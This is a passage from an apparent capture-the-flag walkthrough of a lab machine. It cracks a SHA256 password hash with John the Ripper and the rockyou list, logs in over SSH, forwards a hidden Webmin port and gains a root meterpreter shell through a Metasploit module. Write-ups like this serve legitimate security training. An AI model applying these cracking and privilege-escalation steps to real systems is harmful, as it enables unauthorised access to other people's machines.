<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">john hash.txt --wordlist=/home/kalisurfer/hacking-tools/rockyou.txt --format=Raw-SHA256</pre>
<p><code>rockyou.txt</code> is a legendary leaked database of passwords (14,344,391 passwords!)</p>
<p>Output:</p>
<pre class="wp-block-preformatted"><code>Using default input encoding: UTF-8
Loaded 1 password hash (Raw-SHA256 [SHA256 512/512 AVX512BW 16x])
Warning: poor OpenMP scalability for this hash type, consider --fork=4
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
videogamer124 (?)
1g 0:00:00:00 DONE (2023-01-14 12:23) 1.449g/s 4369Kp/s 4369Kc/s 4369KC/s vimivera..tyler912
Use the "--show --format=Raw-SHA256" options to display all of the cracked passwords reliably
Session completed</code>
</pre>
</p>
<h2>SSH INTO THE BOX AND GRAB THE USER FLAG</h2>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">ssh [email protected]</pre>
<p>We are in!</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">agent47@gamezone:~$ cat user.txt
64—---digits omitted—--------5c
</pre>
<h2>PRIVILEGE ESCALATION</h2>
<p>This box requires a two-step process of port forwarding via ssh and then throwing a reverse meterpreter shell to a listener. </p>
<p>Let’s check for hidden services running on ports that may be behind a firewall. We can use the ss utility to check out all of the data connections from each port on our target machine.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">agent47@gamezone:~$ ss -t -u -l -p -n</pre>
<p>Output:</p>
<pre class="wp-block-preformatted"><code>Netid State Recv-Q Send-Q Local Address
ort Peer Addressortudp UNCONN 0 0 *:10000 *:*</code></pre>
<p>This first line is curious. It appears that a service is running on port 10000 of the target system. </p>
<p>Let’s go ahead and port forward to see what is lying behind the firewall. Port 10000 is typically used for server tools and configuration services.</p>
<h2>SET UP PORT FORWARD WITH SSH</h2>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="469" height="703" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-220.png" alt="" class="wp-image-1071221" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-220.png 469w, https://blog.finxter.com/wp-content/uplo...00x300.png 200w" sizes="(max-width: 469px) 100vw, 469px" /></figure>
</div>
<p>The following command will activate port forwarding via ssh:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">ssh -L 10000:localhost:10000 [email protected]
password: —-cracked-password—-
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-159-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage 109 packages can be updated.
68 updates are security updates. Last login: Sat Jan 14 18:21:17 2023 from 10.6.2.23
agent47@gamezone:~$
</pre>
<p>We are connected now with port forwarding in place. Let’s navigate in our browser to <code>http://$targetIP:10000</code></p>
<p>After logging in with the same <code>username:password</code> combination we used with <code>ssh</code>, we are given access to a webmin portal.</p>
<h2>PRIVESC WITH METASPLOIT</h2>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img decoding="async" loading="lazy" width="1024" height="682" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-221-1024x682.png" alt="" class="wp-image-1071223" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-221-1024x682.png 1024w, https://blog.finxter.com/wp-content/uplo...00x200.png 300w, https://blog.finxter.com/wp-content/uplo...68x511.png 768w, https://blog.finxter.com/wp-content/uplo...ge-221.png 1056w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
</div>
<p>Searching for <code>webmin</code> in Metasploit brings up the following Metasploit module.</p>
<p>Let’s use it and set it up with the following options:</p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="863" height="608" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-212.png" alt="" class="wp-image-1071190" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-212.png 863w, https://blog.finxter.com/wp-content/uplo...00x211.png 300w, https://blog.finxter.com/wp-content/uplo...68x541.png 768w" sizes="(max-width: 863px) 100vw, 863px" /></figure>
</div>
<p>Let it rip! </p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">run</pre>
<p>And it connects us to a shell. We can use the following command to interact with the meterpreter on session 0.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">sessions -i 0</pre>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="383" height="349" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-213.png" alt="" class="wp-image-1071191" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-213.png 383w, https://blog.finxter.com/wp-content/uplo...00x273.png 300w" sizes="(max-width: 383px) 100vw, 383px" /></figure>
</div>
<p>And we now have our root flag! Thanks for reading this write-up.</p>
</div>
https://www.sickgaming.net/blog/2023/01/...lkthrough/